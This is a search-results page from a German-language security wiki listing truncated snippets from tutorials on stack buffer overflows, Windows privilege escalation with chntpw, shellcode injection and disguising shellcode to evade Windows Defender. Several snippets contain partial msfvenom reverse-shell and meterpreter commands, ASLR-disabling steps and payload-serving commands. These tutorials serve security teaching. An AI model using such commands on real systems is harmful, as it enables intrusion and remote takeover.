Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Buffer overflow in the 64-bit stack - Part 3
- docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... ion on Github in the Dependencies section. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... e check where the path to the ''libc'' is: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... find the offset for ''write()'' function: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
- Buffer overflow in the 64-bit stack - part 1
- ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... d so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... return 0; } </code> \\ \\ === Compile === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... ugger and generate a 200-character string: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
- Buffer overflow in the 64-bit stack - Part 2
- |kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... verflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deac... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... s, we start ropper and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a:
- Privilege escalation: Windows admin thanks to Linux
- ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find ... We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:scree... tion and create it in our $HOME directory. <code bash> mkdir ~/win </code> We then mount the partition. <code bash> sudo mount /dev/sda3 ~/win </code> Now we navig
- Shellcode Injection Part 3
- binary file. We do this with ''%%nasm%%'': <code bash> nasm -f win32 download.asm -o shellcode.o </code... t the binary ''%%C++%%'' friendly display: <code bash> objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep ... d. We generate this with ''%%msfvenom%%''. <code bash> msfvenom -p python/meterpreter/reverse_tcp LHOST... ecutes it. So we prepare this accordingly: <code bash> cp payload.py nat.zip python -m http.server 80
- Shellcode Injection Part 1
- | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... rst we create the shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... ll working}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Shellcode Injection Part 2
- encode any further. The output is binary: <code bash> msfvenom -p windows/x64/shell_reverse_tcp LHOST=... g blog post]] is explained in more detail: <code bash> python3 function_encoder.py --shellcode shell.ra... post-3.png|}} \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Obfuscation: Disguise shellcode as UUIDs
- is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x64/she... e now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </
- Shellcode Injection Part 4
- mpile the code with the following command: <code bash> nasm -f win64 calc-unsanitized.asm -o calc-unsan... ellcode4-01.png|}} ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel